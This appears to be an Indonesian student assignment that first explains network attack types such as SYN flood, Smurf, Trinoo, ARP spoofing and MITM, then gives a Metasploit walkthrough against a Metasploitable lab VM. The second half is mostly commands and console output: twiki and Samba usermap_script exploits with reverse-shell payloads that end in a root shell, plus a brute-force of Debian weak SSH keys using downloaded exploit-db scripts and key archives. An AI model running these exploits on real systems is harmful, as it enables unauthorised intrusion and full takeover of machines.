Anda di halaman 1dari 8

1.

Macam-macam mekanisme serangan :

a) Denial of Service
Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara
menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak
dapat memberikan layanan kepada pengguna. Beberapa cara DOS:
 Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang
dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini
disebut sebagai traffic flooding.
 Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan
oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani
oleh layanan tersebut. Teknik ini disebut sebagai request flooding.

b) SYN Flood
SYN Flood merupakan salah satu bentuk serangan Denial Of Service (DOS) dimana penyerang akan
mengirimkan SYN request kepada mesin sasaran dengan tujuan mengkonsumsi sumber daya dari
server sehingga server tidak bisa melayani lalu lintas yang memang benar benar sah.

Didalam kasus SYN Flood, code ACK (Fase 3 di Three Way Handshaking) tidak pernah di kirimkan
kembali kepada server malah justru mengulangi SYN request ke semua port yang ada di server. Client
membuat semua SYN request tampak valid namun karena IP addressnya adalah palsu maka tidaklah
mungkin server untuk kemudian mengakhiri koneksi tersebut. Akibatnya koneksi masih tetap terbuka (
setengah terbuka) sehingga koneksi tidak juga terjalin ( tertutup) antara client dan server. Demikian
seterusnya , lama kelamaan server akan menjadi sangat sibuk untuk merespon resquest yang tidak
berujung, bahkan pada akhirnya client yang sah pun akan kesulitan masuk untuk terhubung ke server.

c) Ping of Death
Jenis serangan ini mengguna kan utility ping. Mengapa disebut Ping of Death karena
pada umumnya utility ping pada windows mengirimkan paket ping maksimal 65.536 bytes sedangkan
Ping of Death mengirimkan lebih dari itu, misalnya saja 112.000 bytes dan paket ping of death ini
mudah direkayasa, sehingga tidak bisa diketahui alamat pengirimnya (IP address). Untuk mencoba
ping maksimal pada windows dapat digunakan command ping -l 65500 192.168.0.1
“ping<spasi>-l<spasi>besarnya_paket<spasi>target”.

Secara tradisional, sangat mudah untuk mengeksploitasi bug ini. Secara umum, mengirimkan paket
65.536 byte ping adalah illegal menurut protokol jaringan, tetapi sebuah paket semacam ini dapat
dikirim jika paket tersebut sudah terpecah-pecah, Ketika komputer target menyusun paket yg sudah
terpecah-pecah tersebut, sebuah buffer overflow mungkin dapat terjadi, dan ini yang sering
menyebabkan sistem crash.

d) Smurf attack
Smurf attack adalah serangan secara paksa pada fitur spesifikasi IP yang kita kenal sebagai direct
broadcast addressing. Seorang Smurf hacker biasanya membanjiri router kita dengan paket permintaan
echo Internet Control Message Protocol (ICMP) yang kita kenal sebagai aplikasi ping. Karena alamat
IP tujuan pada paket yang dikirim adalah alamat broadcast dari jaringan anda, maka router akan
mengirimkan permintaan ICMP echo ini ke semua mesin yang ada di jaringan. Kalau ada banyak host
di jaringan, maka akan terjadi trafik ICMP echo respons & permintaan dalam jumlah yang sangat
besar.

Semakin banyak komputer yang terdapat di dalam jaringan yang sama dengan target, maka semakin
banyak pula ICMP echo reply yang dikirimkan kepada target, sehingga akan membanjiri sumber daya
komputer target, dan mengakibatkan kondisi penolakan layanan (Denial of Service) yang menjadikan
para pengguna tidak dapat mengakses layanan yang terdapat di dalam komputer yang diserang.
Beberapa sistem bahkan mengalami crash atau hang, dan lagi, banjir yang berisi paket-paket "ICMP
echo request/reply" akan membuat kongesti (kemacetan) jaringan yang dapat memengaruhi komputer
lainnya.
e) UDP Flood
UDP (User Datagram Protocol) flood adalah Serangan yang memanfaatkan protokol UDP yang
connectionless untuk menyerang target. Karena sifatnya itulah UDP flood cukup mudah untuk
dilakukan. Dengan cara, sejumlah paket data yang besar dikirimkan begitu saja kepada korban. Korban
yang kaget dan tidak siap menerima serangan ini tentu akan bingung dan pada komputer server tersebut
akan hang karena besarnya paket data yang diterima. Penyerang biasanya menggunakan tehnik spoofed
(penyamaran) untuk menyembunyikan identitasnya.

f) Distributed Denial of Service


DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber
daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system
yang „menyerang‟ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online
tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-
lamanya. Target serangan DoS attack bisa ditujukan ke berbagai bagian jaringan. Bisa ke routing
devices, web, electronic mail, atau server Domain Name System.

g) Tribe flood network


Jenis serangan DOS yang memanfaatkan perubahan sumber alamat IP palsu atau perubahan sumber
alamat IP secara cepat sehingga memungkinkan penyerang untuk menggagalkan upaya korban yang
ingin menyingkirkan serangan DOS.

h) Trinoo
Trinoo (trin00) merupakan program slave atau master terkenal yang digunakan dalam serangan DDoS.
Jaringan Trinoo dapat memiliki ratusan atau bahkan ribuan sistem di internet yang diambil alih dengan
mengeksploitasi buffer overrun secara remote. Akses ke sistem-sistem yang dijadikan agen tersebut
didapatkan dengan menanamkan program backdoor yang sekaligus merupakan daemon Trinoo. Trinoo
menggunakan TCP dan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah :
 Attacker to Master : 27665/tcp
 Master to Daemon : 27444/udp
 Daemon to Master(s) : 31335/udp

i) Stacheldraht
Stacheldraht merupakan tool DDoS yang terdiri atas gabungan antara TFN (Tribe Flood Network) dan
Trinoo, dengan tambahan feature lain, seperti enkripsi komunikasi antara komponen dan update secara
otomatis pada daemon. Stacheldraht menggunakan TCP dan ICMP pada port :
 Client to handler : 16660/TCP
 Handler to and from agents : 65000/- TCP, ICMP ECHO_REPLY

Tool Stacheldraht memiliki dua komponen, yaitu client dan handler. Penyerang dapat berinteraksi
dengan handler, kemudian handler akan mengontrol client. Sistem pada client inilah yang melancarkan
serangan kepada mesin target.

j) Spoofing
Spoofing merupakan tekn ik yang digunakan untuk memperoleh akses yang tidak sah ke suatu
komputer, informasi, atau ke suat jejaring sosial, dimana penyerang berpura-pura memalsukan bahwa
mereka adalah host pemilik sebenarnya dan atau host yang terpercaya.

k) DNS spoofing
Memalsukan alamat IP dari sebuah domain.

l) IP spoofing
IP spoofing adalah salah satu teknik yang banyak digunakan di internet untuk
menyembunyikan atau memalsukan source IP address sehingga asal dari paket network tidak
bisa terlacak ataupun untuk mengelabui komputer tujuan.

m) ARP spoofing
ARP Spoofing adalah teknik dimana seorang penyerang mengirimkan Address Resolution Protocol
(ARP) pesan palsu ke Local Area Network . Umumnya, bertujuan untuk mengasosiasikan MAC
Address penyerang dengan IP Address target (seperti default gateway ), hal ini menyebabkan lalu lintas
yang ditujukan ke IP Address target akan dikirim ke penyerang sebagai gantinya. Spoofing ARP dapat
memungkinkan seorang penyerang untuk mencegat frame data pada LAN, memodifikasi lalu lintas,
atau menghentikan lalu lintas sama sekali.

n) Web spoofing
Web spoofing adalah kegiatan yang menipu pengunjung website dengan cara mengelabuhi korban atau
user yang sedang mengakses website attacker yang mirip dengan website tujuan user, sedangkan user
menginput username dan password yang di gunakan untuk mengakses data yang berada di dalam
website tersebut.

o) Man in the middle attack


MITM attack adalah serangan dimana attacker berada di tengah dan dengan bebas mendengarkan dan
mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif
mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan
antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak
hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice
berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang
dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi.

p) ARP Poisoning
Paket ARP dari komputer A ditujukan untuk komputer B, ketika komputer A mem-broadcast paket
ARP di jaringan, maka komputer C (sang manipulator) dapat "meracuni" (Posioning) paket ARP
tersebut agar paket ARP ditujukan ke komputer C terlebih dahulu baru di forward ke komputer
B. Poisoning ini mengganti MAC Address komputer B dengan MAC Address komputer C di tabel
ARP komputer A dan sebaliknya, MAC Address komputer A diganti menjadi MAC Address komputer
C di tabel ARP komputer B.

q) DNS Poisoning
DNS Posioning adalah sebuah aksi untuk membelokkan akses menuju suatu website ke alamat website
yang lain yang bisa membahayakan data dan informasi user.

r) Wireless attack
Aktifitas serangan yang terjadi pada jaringan wifi tertentu dengan tujuan untuk membuat host korban
crash atau hang dan bisa juga untuk mencuri data korban.

s) Wireless sniffing
Suatu aktifitas menyadap yang dilakukan dalam jaringan wifi tertentu.

t) War driving
Wardriving ialah suatu kegiatan mencari keberadaan jaringan Wireless LAN dan menandai lokasi
akses point yang ditemukan, sambil berkendara di suatu daerah tertentu (biasanya dalam suatu kota).
Biasanya yang menjadi incaran wardriver ialah jaringan nirkabel yang tidak diberi password atau
enkripsi untuk melindunginya. Kegiatan ini dilakukan untuk mendapatkan informasi tentang suatu
jaringan wifi dan mendapatkan akses terhadap jaringan wireless tersebut.
2. Exploit Pada Metasploit

1. Exploit pada vsftpd 2.3.4 (port 21):

Melakukan exploit dengan menggunakan nmap pada host target (192.168.56.101).


2. Exploit port 80

1 msf > use exploit/unix/webapp/twiki_history


2 msf exploit(twiki_history) > show options
3
4 Module options (exploit/unix/webapp/twiki_history):
5
6 Name Current Setting Required Description
7 ---- --------------- -------- -----------
8 Proxies no Use a proxy chain
9 RHOST yes The target address
10 RPORT 80 yes The target port
11 URI /twiki/bin yes TWiki bin directory path
12 VHOST no HTTP server virtual host
13
14
15 Exploit target:
16
17 Id Name
18 -- ----
19 0 Automatic
20
21
22 msf exploit(twiki_history) > set RHOST 192.168.127.154
23 RHOST => 192.168.127.154
24 msf exploit(twiki_history) > set payload cmd/unix/reverse
25 payload => cmd/unix/reverse
26 msf exploit(twiki_history) > exploit
27
28 [*] Started reverse double handler
29 [*] Accepted the first client connection...
30 [*] Accepted the second client connection...
31 [*] Command: echo ZeiYbclsufvu4LGM;
32 [*] Writing to socket A
33 [*] Writing to socket B
34 [*] Reading from sockets...
35 [*] Successfully sent exploit request
36 [*] Reading from socket B
37 [*] B: "ZeiYbclsufvu4LGM\r\n"
38 [*] Matching...
39 [*] A is input...
40 [*] Accepted the first client connection...
41 [*] Accepted the second client connection...
42 [*] Command: echo D0Yvs2n6TnTUDmPF;
43 [*] Writing to socket A
44 [*] Writing to socket B
45 [*] Reading from sockets...
46 [*] Command shell session 2 opened (192.168.127.159:4444 ->
47 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300
48 [*] Reading from socket B
49 [*] B: "D0Yvs2n6TnTUDmPF\r\n"
50 [*] Matching...
51 [*] A is input...
52
53 whoami
54 www-data

Disini kita masih sebagai user biasa, tetapi kita bisa menjadi root dengan menggunakan udev exploit.
3. Exploit port 22 ssh
Package OpenSSL yang terpasang di suatu sistem merupakan celah yang bisa dimasuki dengan
menggunakan bruteforce exploit, karena pemberian angka acak yang lemah. Ini salah satu contoh
angka acaknya: CVE-2008-0166

Kita bisa coba gunakan Ruby exploit : http://www.exploit-db.com/exploits/5632/

Sebelum kita jalankan exploitnya, kita harus men-download keys number :


http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 #untuk dsa keys
http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 #untuk rsa keys

Lalu kita ketikkan seperti ini di terminal:

ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/

ini bertujuan untuk melihat apakah akun root memiliki SSH key yang lemah, dan jika iya, akan muncul
seperti ini:

KEYFILE FOUND:

57c3115d77c56390332dc5c49978627a-5429

Setelah kita mendapat key-nya kita bisa gunakan untuk masuk sebagai root akun melalui SSH:

ssh -l root -p 22 -i 57c3115d77c56390332dc5c49978627a-5429


192.168.127.154

4. Exploit port 23 telnet


Kita bisa gunakan auxiliary module:

1 msf > use auxiliary/scanner/telnet/telnet_version


2 msf auxiliary(telnet_version) > show options
3
4 Module options (auxiliary/scanner/telnet/telnet_version):
5
6 Name Current Setting Required Description
7 ---- --------------- -------- -----------
8 PASSWORD no The password for the specified
9 username
10 RHOSTS yes The target address range or
11 CIDR identifier
12 RPORT 23 yes The target port
13 THREADS 1 yes The number of concurrent
14 threads
15 TIMEOUT 30 yes Timeout for the Telnet probe
16 USERNAME no The username to authenticate
17 as
18
19 msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
20 RHOSTS => 192.168.127.154
21 msf auxiliary(telnet_version) > run
22
23 [*] 192.168.127.154:23 TELNET _ _ _ _ _
24 _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __
25 _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| |
26 __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | |
27 (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/
28 .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a
29 |_| \x0a\x0a\x0aWarning:
30 Never expose this VM to an untrusted network!\x0a\x0aContact:
31 msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get
32 started\x0a\x0a\x0ametasploitable login:
33 [*] Scanned 1 of 1 hosts (100% complete)
34 [*] Auxiliary module execution completed

5. Exploit port 445 Samba


Pertama, kita gunakan auxiliary module untuk mendapat informasi tentang server:

1 msf > use auxiliary/scanner/smb/smb_version


2 msf auxiliary(smb_version) > show options
3
4 Module options (auxiliary/scanner/smb/smb_version):
5
6 Name Current Setting Required Description
7 ---- --------------- -------- -----------
8 RHOSTS yes The target address range or
9 CIDR identifier
10 SMBDomain WORKGROUP no The Windows domain to use for
11 authentication
12 SMBPass no The password for the
13 specified username
14 SMBUser no The username to authenticate
15 as
16 THREADS 1 yes The number of concurrent
17 threads
18
19 msf auxiliary(smb_version) > set RHOSTS 192.168.127.154
20 RHOSTS => 192.168.127.154
21 msf auxiliary(smb_version) > run
22
23 [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language:
24 Unknown) (domain:WORKGROUP)
25 [*] Scanned 1 of 1 hosts (100% complete)
26 [*] Auxiliary module execution completed
27
28 Dengan informasi yang sudah kita dapat ini, kita bisa menggunakan teknik exploit yang sesuai:
29
30 msf > use exploit/multi/samba/usermap_script
31 msf exploit(usermap_script) > show options
32
33 Module options (exploit/multi/samba/usermap_script):
34
35 Name Current Setting Required Description
36 ---- --------------- -------- -----------
37 RHOST yes The target address
38 RPORT 139 yes The target port
39
40
41 Exploit target:
42
43 Id Name
44 -- ----
45 0 Automatic
46
47
48 msf exploit(usermap_script) > set RHOST 192.168.127.154
49 RHOST => 192.168.127.154
50 msf exploit(usermap_script) > set payload cmd/unix/reverse
51 payload => cmd/unix/reverse
52 msf exploit(usermap_script) > show options
53
54 Module options (exploit/multi/samba/usermap_script):
55
56 Name Current Setting Required Description
57 ---- --------------- -------- -----------
58 RHOST 192.168.127.154 yes The target address
59 RPORT 139 yes The target port
60
61
62 Payload options (cmd/unix/reverse):
63
64 Name Current Setting Required Description
65 ---- --------------- -------- -----------
66 LHOST yes The listen address
67 LPORT 4444 yes The listen port
68
69
70 Exploit target:
71
72 Id Name
73 -- ----
74 0 Automatic
75
76
77 msf exploit(usermap_script) > set LHOST 192.168.127.159
78 LHOST => 192.168.127.159
79 msf exploit(usermap_script) > set RPORT 445
80 RPORT => 445
81 msf exploit(usermap_script) > exploit
82
83 [*] Started reverse double handler
84 [*] Accepted the first client connection...
85 [*] Accepted the second client connection...
86 [*] Command: echo f8rjvIDZRdKBtu0F;
87 [*] Writing to socket A
88 [*] Writing to socket B
89 [*] Reading from sockets...
90 [*] Reading from socket B
91 [*] B: "f8rjvIDZRdKBtu0F\r\n"
92 [*] Matching...
93 [*] A is input...
94 [*] Command shell session 1 opened (192.168.127.159:4444 ->
95 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300
96
97 whoami
98 root

Kita bisa lihat, sekarang kita telah masuk sebagai root.

Anda mungkin juga menyukai